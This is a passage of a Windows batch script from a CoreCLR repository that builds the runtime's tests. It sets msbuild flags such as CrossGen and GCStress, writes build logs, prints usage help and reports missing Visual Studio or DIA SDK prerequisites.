set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:CrossGen=true
)
if defined __ILAsmRoundtrip (
echo Building tests with IlasmRoundTrip enabled.
set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:IlasmRoundTrip=true
)
if defined __TestPriority (
echo Building Test Priority %__TestPriority%
set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:CLRTestPriorityToBuild=%__TestPriority%
)
if %__GCStressLevel% GTR 0 (
echo Tests will run under GCStressLevel = %__GCStressLevel%
set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:GCStressLevel=%__GCStressLevel%
)
if defined __LongGCTests (
echo Building tests with Long GC tests enabled.
set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:GCLongRunning=true
)
if defined __GCSimulatorTests (
echo Building GCSimulator tests
set __msbuildManagedBuildArgs=%__msbuildManagedBuildArgs% /p:GCSimulatorRun=true
)
set __BuildLogRootName=Tests_Managed
call :msbuild "%__ProjectFilesDir%\build.proj" %__msbuildManagedBuildArgs%
if errorlevel 1 exit /b 1
set CORE_ROOT=%__TestBinDir%\Tests\Core_Root
echo %__MsgPrefix%Creating test overlay...
set __BuildLogRootName=Tests_Overlay_Managed
call :msbuild "%__ProjectFilesDir%\runtest.proj" /t:CreateTestOverlay
if errorlevel 1 exit /b 1
REM =========================================================================================
REM ===
REM === All builds complete!
REM ===
REM =========================================================================================
echo %__MsgPrefix%Test build successful.
echo %__MsgPrefix%Test binaries are available at !__TestBinDir!
exit /b 0
REM =========================================================================================
REM ===
REM === Helper routines
REM ===
REM =========================================================================================
:msbuild
@REM Subroutine to invoke msbuild. All arguments are passed to msbuild. The first argument should be the
@REM .proj file to invoke.
@REM
@REM On entry, __BuildLogRootName must be set to a file name prefix for the generated log file.
@REM All the "standard" environment variables that aren't expected to change per invocation must also be set,
@REM like __msbuildCommonArgs.
@REM
@REM The build log files will be overwritten, not appended to.
echo %__MsgPrefix%Invoking msbuild
set "__BuildLog=%__LogsDir%\%__BuildLogRootName%_%__BuildOS%__%__BuildArch%__%__BuildType%.log"
set "__BuildWrn=%__LogsDir%\%__BuildLogRootName%_%__BuildOS%__%__BuildArch%__%__BuildType%.wrn"
set "__BuildErr=%__LogsDir%\%__BuildLogRootName%_%__BuildOS%__%__BuildArch%__%__BuildType%.err"
set __msbuildLogArgs=^
/fileloggerparameters:Verbosity=%__verbosity%;LogFile="%__BuildLog%";Append ^
/fileloggerparameters1:WarningsOnly;LogFile="%__BuildWrn%" ^
/fileloggerparameters2:ErrorsOnly;LogFile="%__BuildErr%" ^
/consoleloggerparameters:Summary ^
/verbosity:minimal
set __msbuildArgs=%* %__msbuildCommonArgs% %__msbuildLogArgs%
@REM The next line will overwrite the existing log file, if any.
echo Invoking: %_msbuildexe% %__msbuildArgs% > "%__BuildLog%"
%_msbuildexe% %__msbuildArgs%
if errorlevel 1 (
echo %__MsgPrefix%Error: build failed. Refer to the build log files for details:
echo %__BuildLog%
echo %__BuildWrn%
echo %__BuildErr%
exit /b 1
)
exit /b 0
:Usage
echo.
echo Usage:
echo %0 [option1] [option2] ...
echo All arguments are optional. Options are case-insensitive. The options are:
echo.
echo./? -? /h -h /help -help: view this message.
echo Build architecture: only x64 is currently allowed ^(default: x64^).
echo Build type: one of Debug, Checked, Release ^(default: Debug^).
echo Visual Studio version: one of VS2013 or VS2015 to force using a particular
echo Visual Studio version ^(default: VS2015^).
echo clean: force a clean build ^(default is to perform an incremental build^).
echo CrossGen: enables the tests to run crossgen on the test executables before executing them.
echo msbuildargs ... : all arguments following this tag will be passed directly to msbuild.
echo priority ^<N^> : specify a set of test that will be built and run, with priority N.
echo gcstresslevel ^<N^> : specify the GCStress level the tests should run under.
echo sequential: force a non-parallel build ^(default is to build in parallel
echo using all processors^).
echo longgctests: Build tests so that runtests.cmd will do a long-running GC test.
echo gcsimulator: Build tests so that runtests.cmd will do a GCSimulator test run.
echo IlasmRoundTrip: enables ilasm round trip build and run of the tests before executing them.
echo verbose: enables detailed file logging for the msbuild tasks into the msbuild log file.
exit /b 1
:NoVS
echo Visual Studio 2013+ ^(Community is free^) is a prerequisite to build this repository.
echo See: https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/developer-guide.md#prerequisites
exit /b 1
:NoDIA
echo Error: DIA SDK is missing at "%VSINSTALLDIR%DIA SDK". ^
This is due to a bug in the Visual Studio installer. It does not install DIA SDK at "%VSINSTALLDIR%" but rather ^
at the install location of previous Visual Studio version. The workaround is to copy the DIA SDK folder from the Visual Studio install location ^
of the previous version to "%VSINSTALLDIR%" and then build.
:: DIA SDK not included in Express editions
echo Visual Studio 2013 Express does not include the DIA SDK. ^
You need Visual Studio 2013+ (Community is free).
echo See: https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/developer-guide.md#prerequisites
exit /b 1
:PrivateToolSet
echo %__MsgPrefix% Setting Up the usage of __ToolsetDir:%__ToolsetDir%
if /i "%__ToolsetDir%" == "" (
echo %__MsgPrefix%Error: A toolset directory is required for the Arm64 Windows build. Use the toolset_dir argument.
exit /b 1
)
set PATH=%__ToolsetDir%\VC_sdk\bin;%PATH%
set LIB=%__ToolsetDir%\VC_sdk\lib\arm64;%__ToolsetDir%\sdpublic\sdk\lib\arm64
set INCLUDE=^
%__ToolsetDir%\VC_sdk\inc;^
%__ToolsetDir%\sdpublic\sdk\inc;^
%__ToolsetDir%\sdpublic\shared\inc;^
%__ToolsetDir%\sdpublic\shared\inc\minwin;^
%__ToolsetDir%\sdpublic\sdk\inc\ucrt;^
%__ToolsetDir%\sdpublic\sdk\inc\minwin;^
%__ToolsetDir%\sdpublic\sdk\inc\mincore;^
%__ToolsetDir%\sdpublic\sdk\inc\abi;^
%__ToolsetDir%\sdpublic\sdk\inc\clientcore;^
%__ToolsetDir%\diasdk\include
exit /b 0
| bartonjs/coreclr | tests/buildtest.cmd | bat | mit | 16,910 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.